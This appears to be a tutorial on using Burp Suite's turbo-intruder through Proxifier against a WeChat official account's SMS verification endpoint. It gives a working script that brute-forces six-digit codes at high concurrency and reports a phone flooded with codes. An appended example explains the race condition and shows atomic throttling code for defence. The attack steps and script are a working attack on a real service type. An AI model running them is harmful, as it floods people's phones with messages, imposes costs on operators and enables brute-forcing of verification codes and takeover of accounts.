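Installing turbo-intruder in Burp Suite
1. Open Burp Suite and download and install the extension directly from the BApp Store.
Using Burp Suite together with Proxifier
1. Open Proxifier, configure the proxy, and use it together with Burp Suite.
2. Open the WeChat official account, find a page that can send a verification code, enter a phone number, and capture the request.
3. Right-click the captured request and send it to the turbo-intruder extension for high-concurrency brute forcing.
Below the Host header, add: x-req: %s
Enter the following code in the lower pane: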
    from itertools import product

    def brute_veify_code(target, engine, length):
        # Queue every numeric code of the given length; each value fills the %s placeholder
        pattern = '1234567890'
        for i in product(pattern, repeat=length):
            code = ''.join(i)
            engine.queue(target.req, code)

    def queueRequests(target, wordlists):
        engine = RequestEngine(endpoint=target.endpoint,
                               concurrentConnections=30,
                               requestsPerConnection=100,
                               pipeline=True
                               )
        brute_veify_code(target, engine, 6)

    def handleResponse(req, interesting):
        # currently available attributes are req.status, req.wordcount, req.length and req.response
        if 'error' not in req.response:
            table.add(req)
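4. Click Attack to start the attack.
5. The extension starts successfully. Turn off interception and check the phone: a large number of verification codes arrive at the same time.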
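The result in step 5 means the send-code endpoint does not hold a per-number limit when requests arrive concurrently. As an added example (not part of the original page), the sketch below puts a check-then-act cooldown beside one whose check and record happen atomically, and fires 30 simultaneous requests at each; the class names, the 60-second window and the in-memory store are assumptions.

```python
import threading
import time

COOLDOWN_SECONDS = 60  # assumed window, not taken from the page

class RacySmsThrottle:
    """Check-then-act: concurrent requests all pass the check before any records a send."""
    def __init__(self):
        self.last_sent = {}

    def allow(self, phone, now=None):
        now = time.monotonic() if now is None else now
        last = self.last_sent.get(phone)
        if last is not None and now - last < COOLDOWN_SECONDS:
            return False
        time.sleep(0.01)  # stands in for SMS gateway latency
        self.last_sent[phone] = now
        return True

class AtomicSmsThrottle:
    """Check and record under one lock, before the gateway would be called."""
    def __init__(self):
        self.last_sent = {}
        self.lock = threading.Lock()

    def allow(self, phone, now=None):
        now = time.monotonic() if now is None else now
        with self.lock:
            last = self.last_sent.get(phone)
            if last is not None and now - last < COOLDOWN_SECONDS:
                return False
            self.last_sent[phone] = now
        return True

def count_sends(throttle, phone, workers=30):
    """Issue `workers` simultaneous requests for one number; return how many may send."""
    results = []
    barrier = threading.Barrier(workers)

    def request():
        barrier.wait()  # release all threads together
        results.append(throttle.allow(phone))

    threads = [threading.Thread(target=request) for _ in range(workers)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)
```

With several application processes, the same atomic step has to live in a shared store, for example Redis `SET key value NX EX 60`, rather than in a per-process lock.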